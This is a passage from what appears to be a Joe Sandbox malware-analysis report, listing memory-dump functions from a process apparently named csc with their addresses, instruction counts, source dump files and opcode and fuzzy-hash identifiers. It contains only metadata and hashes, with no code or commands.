                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 1c6efb20895954c011a073022c9de4e65f3b98e48eeab6f6b4d2a6144aae3b60
                                                                                                                                                      • Instruction ID: e948121ba988e91178530d3d49c72c703ab7053a631de0848545ae8e8bbdad68
                                                                                                                                                      • Opcode Fuzzy Hash: 1c6efb20895954c011a073022c9de4e65f3b98e48eeab6f6b4d2a6144aae3b60
                                                                                                                                                      • Instruction Fuzzy Hash: B8F082716042065BC7119B2AE884D4BFFAADFD0364720893EF55A47111CE706D46C6E5
                                                                                                                                                      Function 09361F80 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 657b909c0d03dece69289933d3ec7564fccaa100d59ceac8c0c8e14cfaf4c8a4
                                                                                                                                                      • Instruction ID: a1d8f0d7d3ce86b06f08a111d3ed8883ea46177f4736a1e57262ce786e5701d0
                                                                                                                                                      • Opcode Fuzzy Hash: 657b909c0d03dece69289933d3ec7564fccaa100d59ceac8c0c8e14cfaf4c8a4
                                                                                                                                                      • Instruction Fuzzy Hash: CAF012B2C0921A9FCB01CFE984056EEFBF4EB15300F1481A6D020DB2A5E3788A59CF91
                                                                                                                                                      Function 09360650 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 5cddd7a234c660d1a6baf96321f6e61717a1f9b86d96f286c8bd0dde4754482a
                                                                                                                                                      • Instruction ID: 8316ad732d8662dbd9f3c16ee42d3f542010921211177fd7b8e180459ee32020
                                                                                                                                                      • Opcode Fuzzy Hash: 5cddd7a234c660d1a6baf96321f6e61717a1f9b86d96f286c8bd0dde4754482a
                                                                                                                                                      • Instruction Fuzzy Hash: 13F06531A04218AFDB09EF99D0487DDBFF7DF84220F04C095D00993290DB701E85CB84
                                                                                                                                                      Function 0A284108 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4048471418.000000000A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A280000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_a280000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 2f03775da4fc84814324ae980e1eac85f6aa27dd96035480d3783d9558d4ed1a
                                                                                                                                                      • Instruction ID: 6327a297a65c486d6cf9e7915d229a07a07df66e52750ba2e552f9fe4252dab5
                                                                                                                                                      • Opcode Fuzzy Hash: 2f03775da4fc84814324ae980e1eac85f6aa27dd96035480d3783d9558d4ed1a
                                                                                                                                                      • Instruction Fuzzy Hash: C6F0FE30A10205DFCB54DFA9E44488CF7B6FF85315751C4A5E5199B360DB31AC02CB41
                                                                                                                                                      Function 09379FE8 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047284295.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9370000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: fed21a0d999660a092116fd02e3d389a659a6d9700c55ae24a834e38511c13d6
                                                                                                                                                      • Instruction ID: ec54405ec339df0e8b4d5d6a00eafe93247e5ebb7a487120eb023c9bd7d5b3a3
                                                                                                                                                      • Opcode Fuzzy Hash: fed21a0d999660a092116fd02e3d389a659a6d9700c55ae24a834e38511c13d6
                                                                                                                                                      • Instruction Fuzzy Hash: 2DF030357102108FC795FB78D058A2E36E3AF8D214B414498D94BD7360DE34AC02CB46
                                                                                                                                                      Function 09367BB0 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: bc65696797cfaf908507c6c665d7ed9af8e7ec7e40263dffc1ae7024952f3f88
                                                                                                                                                      • Instruction ID: 5d53d4f671d9c85e3440886d397b3db549ea413a0fb5feae93b0bc14865ecf5a
                                                                                                                                                      • Opcode Fuzzy Hash: bc65696797cfaf908507c6c665d7ed9af8e7ec7e40263dffc1ae7024952f3f88
                                                                                                                                                      • Instruction Fuzzy Hash: 07E0D87130020647C714AB1AEC84C4FFF9BDFD0360320C93AF50A87221CE74AC4A8790
                                                                                                                                                      Function 093622E8 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 7da0f9b3462cb710d710bb055188ad018f2e66bcba22813c4ac3dccbbb263336
                                                                                                                                                      • Instruction ID: c8981aa400e3a0aa180026ad21c4d6fea87016079a6bdf967ba3f0c4fdb15aa4
                                                                                                                                                      • Opcode Fuzzy Hash: 7da0f9b3462cb710d710bb055188ad018f2e66bcba22813c4ac3dccbbb263336
                                                                                                                                                      • Instruction Fuzzy Hash: 2CE02631300304E7CB71A6A4480171272C85B453A0F61802CF305CB294DAA1DC018B62
                                                                                                                                                      Function 0A281E50 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4048471418.000000000A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A280000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_a280000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 8ca47a58707900b941b75dab0a2f9ab4e7804fc594e0ec0a80e9bf383a7857b0
                                                                                                                                                      • Instruction ID: 0a1258ff5f9f8645c418ad9e9a23cc993e53ec4eba5a705144f4f352d904d962
                                                                                                                                                      • Opcode Fuzzy Hash: 8ca47a58707900b941b75dab0a2f9ab4e7804fc594e0ec0a80e9bf383a7857b0
                                                                                                                                                      • Instruction Fuzzy Hash: 67E026763236028FC7386F54F1047BA77AADF84212F088179E90B83AC1CA386C028799
                                                                                                                                                      Function 0A2875B6 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4048471418.000000000A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A280000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_a280000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: cce92485b6333c55276351c6e1d245aa6cb1c25fd36ad2bfe4454784620dd2e2
                                                                                                                                                      • Instruction ID: a38b67abe56c5ec0f1aba637b3078be4fcaaf1ca6384eb722c65ca78043d7d11
                                                                                                                                                      • Opcode Fuzzy Hash: cce92485b6333c55276351c6e1d245aa6cb1c25fd36ad2bfe4454784620dd2e2
                                                                                                                                                      • Instruction Fuzzy Hash: A9E04F77B00524DF8B50A7A8E80409CB7B6EFCD66571045A5EE06DB360DF305D118B91
                                                                                                                                                      Function 09379B5A Relevance: .0, Instructions: 22COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047284295.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9370000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: d086856d42d6b9ba7875536b1b875fec25b8a8412197893d0925e4d704b42739
                                                                                                                                                      • Instruction ID: fd2b0e1f09cb56d897eb3da4ae0f797d82578c230c2bb489272d1dc22363dc2f
                                                                                                                                                      • Opcode Fuzzy Hash: d086856d42d6b9ba7875536b1b875fec25b8a8412197893d0925e4d704b42739
                                                                                                                                                      • Instruction Fuzzy Hash: D9E02230A0036ACFDB345E34CD803BAB2A7BB84310B100B29D84386300CB384C43CF52
                                                                                                                                                      Function 09369217 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 50ac9ffafbc31211ecb42afc04de952230401df5154a19c964b1ef27f13c23b9
                                                                                                                                                      • Instruction ID: 6df65e551cb0781f71c583207548adfd3b839f89683e3f229a0225a067b9d235
                                                                                                                                                      • Opcode Fuzzy Hash: 50ac9ffafbc31211ecb42afc04de952230401df5154a19c964b1ef27f13c23b9
                                                                                                                                                      • Instruction Fuzzy Hash: 49E0CD303087564FC716962DA8409973BD78F4A6447144696F081C7296DA64DC0A47D1
                                                                                                                                                      Function 093795F0 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047284295.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9370000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 357164b5919499c509524cc2b731b38ba68e84eaa8f9306256d96303e41d566f
                                                                                                                                                      • Instruction ID: a786d52e0bfcb56c44247256d26acd581000c08bf5fd1f12999d97ea193df6a0
                                                                                                                                                      • Opcode Fuzzy Hash: 357164b5919499c509524cc2b731b38ba68e84eaa8f9306256d96303e41d566f
                                                                                                                                                      • Instruction Fuzzy Hash: B3D05E32A0120CEBCB20DEB5EE015AAF3ACDB05115B1006F9AC0DD3200FE36DE10DB91
                                                                                                                                                      Function 09376701 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047284295.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9370000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 8921af7b11967fe36adac6b0b09ea8e016ecb0292f5eeea9f0faba13fad69a7f
                                                                                                                                                      • Instruction ID: 922a6f8ddd944ba3dd6f4135dcb0addffd43f6cb307e66d2f77bfc96e2b01b01
                                                                                                                                                      • Opcode Fuzzy Hash: 8921af7b11967fe36adac6b0b09ea8e016ecb0292f5eeea9f0faba13fad69a7f
                                                                                                                                                      • Instruction Fuzzy Hash: FCE06D35900325DFDB288B24CC01B58F771BF04344F0545E4E959A7252DB38AD409F42
                                                                                                                                                      Function 0A281E4C Relevance: .0, Instructions: 20COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4048471418.000000000A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A280000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_a280000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 265139e7d93e49417d672f347a11782ec796c1951b4dd5ae3710ed1c05df060b
                                                                                                                                                      • Instruction ID: 569ab429c1cbb3325b74a3730a361e2290bc30e99e285c4b970ccb37303a1b3c
                                                                                                                                                      • Opcode Fuzzy Hash: 265139e7d93e49417d672f347a11782ec796c1951b4dd5ae3710ed1c05df060b
                                                                                                                                                      • Instruction Fuzzy Hash: 44D05B71313515A7C7387F54F5055BE776ADB44612B044279F946426C28B645C0146D6
                                                                                                                                                      Function 0937DD50 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047284295.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9370000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: dd67dff026b79a12453516bfa98f148dc1717400ece2d653b9a58b8d5d4f6dca
                                                                                                                                                      • Instruction ID: 81b915324567d854ceafd60ccb1f541db7b6cf9582ba1a3572cdc3e065ae84a7
                                                                                                                                                      • Opcode Fuzzy Hash: dd67dff026b79a12453516bfa98f148dc1717400ece2d653b9a58b8d5d4f6dca
                                                                                                                                                      • Instruction Fuzzy Hash: 64E01270A0120CEFDB00FFB5D941A6D77F6EFC5214F508598E90597380DA356E029B80
                                                                                                                                                      Function 0979298F Relevance: .0, Instructions: 18COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047906214.0000000009790000.00000040.00000800.00020000.00000000.sdmp, Offset: 09790000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9790000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 7c6dc44746f19ebc7ac9e4e6291d087abcd3e9b6822ffb0ec36d279005a81a73
                                                                                                                                                      • Instruction ID: c13dc4fc7595ccb7363123ae2dfecea0db3b7c73ad59a4ea8e2a5323a1372b2f
                                                                                                                                                      • Opcode Fuzzy Hash: 7c6dc44746f19ebc7ac9e4e6291d087abcd3e9b6822ffb0ec36d279005a81a73
                                                                                                                                                      • Instruction Fuzzy Hash: 86F06C78A14A14CFC754CF28C884A59BBB1FF49211F1141E9E90AA7360CB34AD81CF01
                                                                                                                                                      Function 0937DD08 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047284295.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9370000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 2db4d26318898b96ee6046d1c4bb471e684ecfc3de8634609ffaf86fb7ca4b49
                                                                                                                                                      • Instruction ID: 0185c1014d6229fa5bd62f74a8622f98b0e1752e7771470645af250575848503
                                                                                                                                                      • Opcode Fuzzy Hash: 2db4d26318898b96ee6046d1c4bb471e684ecfc3de8634609ffaf86fb7ca4b49
                                                                                                                                                      • Instruction Fuzzy Hash: B0E0EC71A00108EFCB40FBA4D90169DB7BAEF49204F204599980993340D9716E019B91
                                                                                                                                                      Function 0937B80A Relevance: .0, Instructions: 17COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047284295.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9370000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 469b5a3fe866f7c8ff4edb52fde362f577fa0de8b74c5fbdae14d43e2f8389ca
                                                                                                                                                      • Instruction ID: 1f63dc1abaa19a77b969c4209f290873f30283964698af9cce194196116337ee
                                                                                                                                                      • Opcode Fuzzy Hash: 469b5a3fe866f7c8ff4edb52fde362f577fa0de8b74c5fbdae14d43e2f8389ca
                                                                                                                                                      • Instruction Fuzzy Hash: C6E04636D05266CFEB315A50D9487EDB777BB02361F1942B1E986A63A0C73C0C42CE82
                                                                                                                                                      Function 0936ED08 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 6a1007b157f92858f0f2de026ba2255c2ebf5c05820d07bbbea553484fd9b103
                                                                                                                                                      • Instruction ID: 6ee9d67dfa8f27dddd3002c33f9ae526405cb019e32b0ee82aae234b15dba9e4
                                                                                                                                                      • Opcode Fuzzy Hash: 6a1007b157f92858f0f2de026ba2255c2ebf5c05820d07bbbea553484fd9b103
                                                                                                                                                      • Instruction Fuzzy Hash: A2D05235009348AFC3029B20E881CA6BFB8EF0A26031A0192F1498B222D221DC28CBB1
                                                                                                                                                      Function 09369200 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: ab4c8c30516f09e97355a438e1c371c3ce30b68f3655d24950641303443268f4
                                                                                                                                                      • Instruction ID: 259fa559e206df21b438f92293ebcbd6ec38c8a4dab14aec761aeec0125457c6
                                                                                                                                                      • Opcode Fuzzy Hash: ab4c8c30516f09e97355a438e1c371c3ce30b68f3655d24950641303443268f4
                                                                                                                                                      • Instruction Fuzzy Hash: F1C09B1805B6953EC71362201C129DE7F6EDC035D43E961D2F040C70E3D60495155DF6
                                                                                                                                                      Function 0936B608 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 945b735a49ed23f31ac29f7517a12d4a6c2ba64054af220d6819361a6b4c8d78
                                                                                                                                                      • Instruction ID: 8117bbcfc25a8bebbd452d3523762ff99791fef85cb991c9acfa6376163a75e8
                                                                                                                                                      • Opcode Fuzzy Hash: 945b735a49ed23f31ac29f7517a12d4a6c2ba64054af220d6819361a6b4c8d78
                                                                                                                                                      • Instruction Fuzzy Hash: 39D0A936001208AFC300AF69D885CC47FA9EF06220B1240E1F9084B233CA229CA8CBA6
                                                                                                                                                      Function 0937AC96 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047284295.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9370000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 204eb1260559afcd288d1fb3e7509a9700cc89deff894c7d844bf7da64f83a73
                                                                                                                                                      • Instruction ID: e24a6c61d8e547068062f6bcfccbbd5b8b3f96d29722997eac286c21a0a02f48
                                                                                                                                                      • Opcode Fuzzy Hash: 204eb1260559afcd288d1fb3e7509a9700cc89deff894c7d844bf7da64f83a73
                                                                                                                                                      • Instruction Fuzzy Hash: B5D01735901256CFEB206A60E9487ADB636BF02361F144270E98656350CA284C42CE96
                                                                                                                                                      Function 09375C9C Relevance: .0, Instructions: 13COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047284295.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9370000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: af48f873098adb04df362c3c948db401d750647b0213f0ecfc6fb59988f20b24
                                                                                                                                                      • Instruction ID: f5e0a42554cfa05c4f9936c6f7d83225f1a9e637465d6e39655e04c5256e1a22
                                                                                                                                                      • Opcode Fuzzy Hash: af48f873098adb04df362c3c948db401d750647b0213f0ecfc6fb59988f20b24
                                                                                                                                                      • Instruction Fuzzy Hash: 3DD012A3D4871C8FDB348B408801394F7A59B45372F4942F7D40EE7A51D23D1D826E52
                                                                                                                                                      Function 0A287628 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4048471418.000000000A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A280000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_a280000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: fa4b26fe7cde75686f2cffaa769397c223bafaa397aaa9dfff05cae8e7725dff
                                                                                                                                                      • Instruction ID: fd0e48ed9272893c2169a9158290a6b37e1d9a042bf6608720210b1a281db4e0
                                                                                                                                                      • Opcode Fuzzy Hash: fa4b26fe7cde75686f2cffaa769397c223bafaa397aaa9dfff05cae8e7725dff
                                                                                                                                                      • Instruction Fuzzy Hash: 14C08C317013088B9B88ABBAB84816A73DEEB8452D7088469F40DC2640EF36E8028981
                                                                                                                                                      Function 093718D0 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047284295.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9370000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 0bb492174ad3a9700dddc12bfdfdd05c9a5eca1a5310ff74a6dfd5c57bc78fcf
                                                                                                                                                      • Instruction ID: 0795408f5b67796c202e016796def364c5ed9caaabe5fe573795506dad469eba
                                                                                                                                                      • Opcode Fuzzy Hash: 0bb492174ad3a9700dddc12bfdfdd05c9a5eca1a5310ff74a6dfd5c57bc78fcf
                                                                                                                                                      • Instruction Fuzzy Hash: 44C08C2040C3C85AC786B7B8740EBCA7F499F13030F0844D9E88EAE007AD480810DABB
                                                                                                                                                      Function 0A285F08 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4048471418.000000000A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A280000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_a280000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: b3aa8e18a961a06db8c54169467d39a59979178695fb42e942ba9635c02632a2
                                                                                                                                                      • Instruction ID: b691ff0b881ce3bd5003934880b826c4b5a10a1430d12376e14e494ef113a05e
                                                                                                                                                      • Opcode Fuzzy Hash: b3aa8e18a961a06db8c54169467d39a59979178695fb42e942ba9635c02632a2
                                                                                                                                                      • Instruction Fuzzy Hash: 87C08C32200319078708A66AB8008967B8FDAC4624704CA36B809861008DA86C4042C4
                                                                                                                                                      Function 09375C76 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047284295.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9370000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: e144ddf26e14c4889d2cd5fb9935d4d7175c1f353be70d2d95b796b46300d149
                                                                                                                                                      • Instruction ID: 6d9a8346d16924b1f6ee4199f785de254ebfebc9366160ea2eb113ea7f4e28c5
                                                                                                                                                      • Opcode Fuzzy Hash: e144ddf26e14c4889d2cd5fb9935d4d7175c1f353be70d2d95b796b46300d149
                                                                                                                                                      • Instruction Fuzzy Hash: 79D0E975900624CFD764CB54C844B54B775AB49311F1541D6D50DA7760C7346D84DF51
                                                                                                                                                      Function 0936B618 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                                                                                                                      • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                                                                                                                                                      • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                                                                                                                      • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                                                                                                                                                      Function 0A287600 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
